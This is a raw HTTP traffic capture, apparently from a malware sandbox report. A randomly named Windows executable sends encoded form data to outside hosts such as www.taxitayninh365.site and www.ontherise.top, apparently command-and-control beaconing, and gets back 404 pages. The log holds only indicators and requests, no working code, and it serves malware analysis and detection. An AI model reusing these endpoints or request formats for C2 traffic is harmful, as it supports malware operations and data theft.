blO4h0=tyMI7ugAvLpMdsg6eSW0hlg99My+VCo35auTO79JGkWR7QT0Tx5QrMJM3U48nj0ZYyuY0c1sRGmvZUraO3t3Knfs6QGOagKukiRGPWYjYdsXfCFJQEp20qEwKnnFVBTYZBHSeQWYq/hyQhgG7sAe4ar2QSmP+Vnsb00+WO/xEHljV6zd9j924RUUyKK0NmPDuGNe76/qZuc53zbR2M+xF6E=
Jan 10, 2025 21:47:52.018850088 CET	1236	IN	HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 1238 date: Fri, 10 Jan 2025 20:47:51 GMT server: LiteSpeed Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;"
Jan 10, 2025 21:47:52.018882036 CET	240	IN	Data Raw: 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6c 69 74 65 73 70 65 65 64 74 65 63 68 2e 63 6f 6d 2f 65 72 72 6f 72 2d 70 61 67 65 22 3e 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 2f 61 3e 3c 70 3e 50 6c 65 61 73 65 20 62 Data Ascii: href="http://www.litespeedtech.com/error-page">LiteSpeed Web Server</a><p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	50024	103.75.185.22	80	3716	C:\Program Files (x86)\kwcfuWceSHsvrYeiuOUWuJxLyqxpHMnSJZrDmZfdyJhKVvOolr\SUMCVKBWRXks.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 21:47:53.667042017 CET	10859	OUT	POST /syud/ HTTP/1.1 Host: www.taxitayninh365.site Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Connection: close Cache-Control: no-cache Content-Length: 10303 Origin: http://www.taxitayninh365.site Referer: http://www.taxitayninh365.site/syud/ User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0 Data Raw: 62 6c 4f 34 68 30 3d 74 79 4d 49 37 75 67 41 76 4c 70 4d 64 73 67 36 65 53 57 30 68 6c 67 39 39 4d 79 2b 56 43 6f 33 35 61 75 54 4f 37 39 4a 47 6b 4f 52 37 69 72 30 56 54 52 51 71 4d 4a 4d 70 45 34 39 6e 6a 30 55 59 79 6d 63 30 63 70 53 52 45 75 76 57 52 6e 61 61 57 74 33 52 33 66 73 6c 67 47 31 48 77 4c 73 6b 6a 39 4b 50 56 67 6a 59 64 73 58 66 43 70 4a 5a 31 70 32 35 4b 45 7a 44 48 6e 5a 52 42 54 67 5a 42 66 43 65 51 61 75 72 4c 56 79 51 42 77 47 33 2f 6f 65 33 61 72 77 56 53 6d 58 2b 56 6a 2f 62 31 59 59 57 4f 37 66 45 41 74 6a 45 4d 32 68 6d 43 46 4c 6a 67 45 2b 72 72 4c 66 44 32 66 31 72 78 5a 33 30 4b 53 77 43 64 41 4a 39 42 4c 63 75 4a 36 68 51 2b 33 41 47 2f 7a 42 62 36 65 41 30 73 56 6e 36 33 65 53 34 56 68 67 6e 38 77 6e 30 53 51 42 69 71 6b 74 58 35 38 6f 74 62 58 63 49 6e 43 48 48 68 54 4f 79 39 5a 30 57 47 4b 4f 68 51 51 6a 50 2b 62 33 70 58 59 6d 45 34 6a 38 7a 4c 39 6c 77 30 59 45 4e 33 6f 4e 4d 2f 61 62 4a 2f 4f 47 43 35 35 5a 4e 74 77 44 61 43 46 71 67 64 76 6d 2f 5a 73 6f 71 41 4c [TRUNCATED] Data Ascii: blO4h0=tyMI7ugAvLpMdsg6eSW0hlg99My+VCo35auTO79JGkOR7ir0VTRQqMJMpE49nj0UYymc0cpSREuvWRnaaWt3R3fslgG1HwLskj9KPVgjYdsXfCpJZ1p25KEzDHnZRBTgZBfCeQaurLVyQBwG3/oe3arwVSmX+Vj/b1YYWO7fEAtjEM2hmCFLjgE+rrLfD2f1rxZ30KSwCdAJ9BLcuJ6hQ+3AG/zBb6eA0sVn63eS4Vhgn8wn0SQBiqktX58otbXcInCHHhTOy9Z0WGKOhQQjP+b3pXYmE4j8zL9lw0YEN3oNM/abJ/OGC55ZNtwDaCFqgdvm/ZsoqALozbgcLb5wLBiMvIewk3gjB6qpCphUIPzhaIIp+ulVB04vTF9XfaL8LDOIt+B/3jIIF0UM1n4yo2oLf0xrVIK4bKNO6lOWmDp/+JdsgfDiCjZKLlPn5GxsqUkFrSqM1RPoPlRvmfioYxe8OiERt9H8NoDdpvRp1WT5as16UlCIf0ZHptScsi8hdS8F63/xx5oatD0DWy4piNfFGfn9PepRv+BGBlhQkjxpDRs6Egens/rhMRSnfApij1hyMr0tV9xtKZMwL04qpMo9WWPVsIwxVqXSYrLakp3iQ/l5q8tEjlxGZ29BrZfBnKDyFST+Qm5zZWsGL8p7bmUyPqgsJq02U20kShIpeTGOYGEHYQD1Ay1WlapLmUbtUYX2J9EslBRbToXzGj7IXqIdtTLiXqGzPudEwfpBXL1chQODUZoE0d5yMk2sMvPu7TyGiqYd+r8knIIOFbC9VxDpj3FEWi5d6BeJLPIerPIWA+2pcbx8aH4YzbE4nA6fD76LAEww/IxSPXZqu8YhGWCmhPXZ8XOSxcjfJUMTOPMEPOwViMCH1XO/HF35gVIHvNsFpgaUvveTayYvyCU+PKN9OIJsd5SqqdieoKzshHfZ+ZVUkiHl9TUsP93pJIgZoo0E12489/0Ry4irZOu74Yhd3orVRQbZqfnebq5O8oSXu [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	50025	103.75.185.22	80	3716	C:\Program Files (x86)\kwcfuWceSHsvrYeiuOUWuJxLyqxpHMnSJZrDmZfdyJhKVvOolr\SUMCVKBWRXks.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 21:47:56.374545097 CET	480	OUT	GET /syud/?blO4h0=gwko4eFZldhJcfMqOkuan3QkmOfQdTdfj6+zOL8mAR+JwCfgYxN4oPNpnnwcuB8vQ1y33dVzUTzhe1i/ZlYVLB7aoFOkRW7okE41Q20TXo8AOTZtTl9M9bg=&Q4DT=n4tTOrYxhN7 HTTP/1.1 Host: www.taxitayninh365.site Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
Jan 10, 2025 21:47:57.241643906 CET	1236	IN	HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 1238 date: Fri, 10 Jan 2025 20:47:57 GMT server: LiteSpeed Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;"
Jan 10, 2025 21:47:57.241667032 CET	240	IN	Data Raw: 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6c 69 74 65 73 70 65 65 64 74 65 63 68 2e 63 6f 6d 2f 65 72 72 6f 72 2d 70 61 67 65 22 3e 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 2f 61 3e 3c 70 3e 50 6c 65 61 73 65 20 62 Data Ascii: href="http://www.litespeedtech.com/error-page">LiteSpeed Web Server</a><p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	50026	162.0.213.94	80	3716	C:\Program Files (x86)\kwcfuWceSHsvrYeiuOUWuJxLyqxpHMnSJZrDmZfdyJhKVvOolr\SUMCVKBWRXks.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 21:48:02.351139069 CET	739	OUT	POST /wr6c/ HTTP/1.1 Host: www.ontherise.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Connection: close Cache-Control: no-cache Content-Length: 203 Origin: http://www.ontherise.top Referer: http://www.ontherise.top/wr6c/ User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0 Data Raw: 62 6c 4f 34 68 30 3d 43 30 78 6b 4c 79 47 43 67 6e 4b 71 34 62 41 47 6c 7a 41 49 72 36 63 2f 76 2f 47 66 78 49 78 31 74 6a 49 5a 4c 68 63 44 72 5a 30 46 57 49 36 79 5a 6e 4b 77 43 47 4f 72 6c 50 43 42 79 6b 31 65 31 72 54 35 52 45 41 49 75 57 67 65 54 47 76 58 63 73 37 5a 70 61 4d 52 77 55 65 6f 31 66 59 47 4e 46 52 66 44 42 53 68 55 59 53 4f 75 2f 35 65 5a 6e 70 75 49 44 69 70 6f 47 33 56 48 7a 4a 54 46 50 37 65 64 69 73 68 31 65 51 78 2b 78 6b 57 47 61 43 56 51 2f 6a 53 6c 47 61 62 61 79 34 6c 73 69 43 48 7a 46 41 79 49 34 56 47 65 2b 4c 69 62 2f 39 76 59 67 70 55 68 69 59 67 4c 63 46 49 52 77 3d 3d Data Ascii: blO4h0=C0xkLyGCgnKq4bAGlzAIr6c/v/GfxIx1tjIZLhcDrZ0FWI6yZnKwCGOrlPCByk1e1rT5REAIuWgeTGvXcs7ZpaMRwUeo1fYGNFRfDBShUYSOu/5eZnpuIDipoG3VHzJTFP7edish1eQx+xkWGaCVQ/jSlGabay4lsiCHzFAyI4VGe+Lib/9vYgpUhiYgLcFIRw==
Jan 10, 2025 21:48:03.104357004 CET	1236	IN	HTTP/1.1 404 Not Found Date: Fri, 10 Jan 2025 20:48:02 GMT Server: Apache Content-Length: 16052 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
Jan 10, 2025 21:48:03.104379892 CET	1236	IN	Data Raw: 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c Data Ascii: > </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="disp
Jan 10, 2025 21:48:03.104394913 CET	448	IN	Data Raw: 38 2e 38 35 38 37 31 35 20 2d 30 2e 36 30 32 31 37 35 2c 2d 33 31 2e 34 36 39 32 32 38 20 2d 30 2e 30 31 32 35 33 2c 2d 32 32 2e 37 35 39 35 36 35 20 30 2e 37 31 37 32 36 32 2c 2d 34 31 2e 32 33 31 34 35 32 31 33 20 31 2e 36 32 38 39 39 35 2c 2d Data Ascii: 8.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;"
Jan 10, 2025 21:48:03.104412079 CET	1236	IN	Data Raw: 36 38 31 31 33 20 2d 31 2e 33 35 35 38 35 33 2c 31 2e 35 30 33 31 32 20 2d 32 2e 34 37 33 37 36 34 2c 33 2e 30 39 31 37 33 20 2d 33 2e 33 38 37 38 36 36 2c 34 2e 35 39 35 33 38 20 2d 30 2e 39 31 34 31 30 33 2c 31 2e 35 30 33 36 35 20 2d 31 2e 36 Data Ascii: 68113 -1.355853,1.50312 -2.473764,3.09173 -3.387866,4.59538 -0.914103,1.50365 -1.620209,2.91586 -2.416229,4.41952 -0.79602,1.50365 -1.67928,3.09352 -0.808656,3.24054 0.870624,0.14702 3.490408,-1.14815 5.700074,-1.91396 2.209666,-0.76581 4.0014
Jan 10, 2025 21:48:03.104491949 CET	1236	IN	Data Raw: 34 39 36 35 35 2c 31 33 2e 36 36 36 30 35 20 2d 31 33 2e 39 31 36 36 30 38 2c 31 38 2e 37 34 39 36 20 2d 33 2e 31 36 36 39 35 32 2c 35 2e 30 38 33 35 35 20 2d 34 2e 33 33 33 34 33 32 2c 38 2e 32 34 39 37 31 20 2d 34 2e 37 35 30 33 31 35 2c 31 31 Data Ascii: 49655,13.66605 -13.916608,18.7496 -3.166952,5.08355 -4.333432,8.24971 -4.750315,11.08369 -0.416883,2.83399 -0.08368,5.33304 1.809372,16.25302 1.893048,10.91998 5.343489,30.24673 9.760132,48.66349 4.416642,18.41676 9.798356,35.91675 15.180267,5
Jan 10, 2025 21:48:03.104506969 CET	448	IN	Data Raw: 37 38 36 2c 36 2e 32 32 39 31 32 20 31 31 2e 36 39 37 38 39 2c 31 32 2e 32 32 39 31 34 20 31 37 2e 31 31 34 35 36 2c 31 38 2e 33 39 35 38 31 20 35 2e 34 31 36 36 36 2c 36 2e 31 36 36 36 37 20 31 30 2e 37 34 39 39 36 2c 31 32 2e 34 39 39 39 35 20 Data Ascii: 786,6.22912 11.69789,12.22914 17.11456,18.39581 5.41666,6.16667 10.74996,12.49995 14.74993,17.91655 3.99997,5.41659 6.66659,9.91653 7.16671,17.83316 0.50012,7.91664 -1.16644,19.24921 -3.3502,31.24619 -2.18376,11.99698 -4.81616,24.33632 -8.4206
Jan 10, 2025 21:48:03.104521990 CET	1236	IN	Data Raw: 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 39 31 2e 39 33 37 35 2c 31 32 34 2e 30 39 39 39 38 20 Data Ascii: /> <path id="path4525" d="m 91.9375,124.09998 c 5.854072,7.16655 11.70824,14.33322 16.21863,20.16651 4.51039,5.83328 7.67706,10.33329 11.92718,16.33346 4.25012,6.00017 9.58322,13.49984 12.66653,18.58299 3.08
Jan 10, 2025 21:48:03.104537010 CET	224	IN	Data Raw: 39 34 33 35 31 37 2c 34 2e 31 32 37 39 35 20 32 2e 38 32 37 35 33 35 2c 31 31 2e 31 39 33 30 32 20 34 2e 30 36 35 30 30 35 2c 31 36 2e 30 32 35 30 31 20 31 2e 32 33 37 34 38 2c 34 2e 38 33 32 20 31 2e 38 32 36 36 38 2c 37 2e 34 32 34 34 37 20 32 Data Ascii: 943517,4.12795 2.827535,11.19302 4.065005,16.02501 1.23748,4.832 1.82668,7.42447 2.12139,10.84263 0.29471,3.41815 0.29471,7.65958 -0.11785,20.44893 -0.41255,12.78934 -1.23731,34.11536 -2.18014,53.62015 -0.94282,19.50478 -2.0
Jan 10, 2025 21:48:03.104549885 CET	1236	IN	Data Raw: 30 33 34 32 39 2c 33 37 2e 31 38 31 35 39 20 2d 33 2e 30 36 34 31 35 34 2c 35 34 2e 38 36 30 33 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 Data Ascii: 03429,37.18159 -3.064154,54.86032" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4541" d="m 85.206
Jan 10, 2025 21:48:03.104566097 CET	224	IN	Data Raw: 2e 32 33 32 36 36 20 63 20 2d 35 2e 34 34 30 31 39 32 2c 31 31 2e 35 36 32 35 31 20 2d 31 30 2e 38 38 30 39 35 31 2c 32 33 2e 31 32 36 32 32 20 2d 31 35 2e 38 39 39 36 35 37 2c 33 33 2e 35 36 33 36 38 20 2d 35 2e 30 31 38 37 30 36 2c 31 30 2e 34 Data Ascii: .23266 c -5.440192,11.56251 -10.880951,23.12622 -15.899657,33.56368 -5.018706,10.43747 -9.614414,19.74672 -11.912808,26.70033 -2.298394,6.95362 -2.298394,11.54922 -1.355419,24.57415 0.942974,13.02493 2.828182,34.46917 5.0660
Jan 10, 2025 21:48:03.109601974 CET	1236	IN	Data Raw: 39 35 2c 35 33 2e 38 34 37 34 36 20 32 2e 32 33 37 39 31 33 2c 31 39 2e 33 37 38 32 39 20 34 2e 38 33 33 31 30 39 2c 33 36 2e 37 31 38 39 32 20 37 2e 34 32 35 39 35 39 2c 35 34 2e 30 34 33 38 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 Data Ascii: 95,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="pa

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	50027	162.0.213.94	80	3716	C:\Program Files (x86)\kwcfuWceSHsvrYeiuOUWuJxLyqxpHMnSJZrDmZfdyJhKVvOolr\SUMCVKBWRXks.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 21:48:04.894244909 CET	759	OUT	POST /wr6c/ HTTP/1.1 Host: www.ontherise.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Connection: close Cache-Control: no-cache Content-Length: 223 Origin: http://www.ontherise.top Referer: http://www.ontherise.top/wr6c/ User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0 Data Raw: 62 6c 4f 34 68 30 3d 43 30 78 6b 4c 79 47 43 67 6e 4b 71 35 36 77 47 6e 51 6f 49 67 36 63 2b 67 66 47 66 37 6f 78 78 74 6a 4d 5a 4c 6c 6c 49 6f 72 51 46 57 74 47 79 59 6d 4b 77 42 47 4f 72 78 66 43 41 76 55 31 5a 31 71 76 78 52 47 55 49 75 58 45 65 54 47 2f 58 63 62 50 61 72 4b 4d 54 39 30 66 4f 78 66 59 47 4e 46 52 66 44 42 57 48 55 59 36 4f 76 50 70 65 59 47 70 74 4c 44 69 75 2f 32 33 56 44 7a 49 59 46 50 36 4c 64 6a 77 50 31 64 34 78 2b 78 55 57 47 50 69 57 65 2f 6a 55 36 57 62 66 54 51 35 32 73 79 4c 75 34 6e 6f 44 43 49 4e 48 62 34 47 34 4b 4f 63 34 4b 67 4e 6e 38 6c 52 55 47 66 34 42 4b 77 54 38 61 51 59 4c 63 34 34 32 4a 36 36 32 78 61 65 56 37 65 49 3d Data Ascii: blO4h0=C0xkLyGCgnKq56wGnQoIg6c+gfGf7oxxtjMZLllIorQFWtGyYmKwBGOrxfCAvU1Z1qvxRGUIuXEeTG/XcbParKMT90fOxfYGNFRfDBWHUY6OvPpeYGptLDiu/23VDzIYFP6LdjwP1d4x+xUWGPiWe/jU6WbfTQ52syLu4noDCINHb4G4KOc4KgNn8lRUGf4BKwT8aQYLc442J662xaeV7eI=
Jan 10, 2025 21:48:05.478665113 CET	1236	IN	HTTP/1.1 404 Not Found Date: Fri, 10 Jan 2025 20:48:05 GMT Server: Apache Content-Length: 16052 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
Jan 10, 2025 21:48:05.478683949 CET	224	IN	Data Raw: 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c Data Ascii: > </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)"
